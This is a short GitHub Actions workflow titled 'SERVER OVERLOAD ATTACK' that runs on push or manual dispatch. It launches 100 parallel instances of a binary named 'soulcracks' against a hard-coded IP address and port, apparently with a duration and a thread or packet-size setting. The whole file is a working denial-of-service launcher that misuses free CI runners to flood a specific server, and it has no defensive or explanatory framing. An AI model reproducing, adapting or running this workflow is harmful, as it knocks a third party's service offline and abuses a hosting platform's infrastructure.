name: SERVER OVERLOAD ATTACK
on: [workflow_dispatch, push]

jobs:
  server_overload:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - run: chmod +x soulcracks
      - run: |
          for i in {1..100}; do
            ./soulcracks 20.204.18.80 10918 240 65535 &
          done
          wait
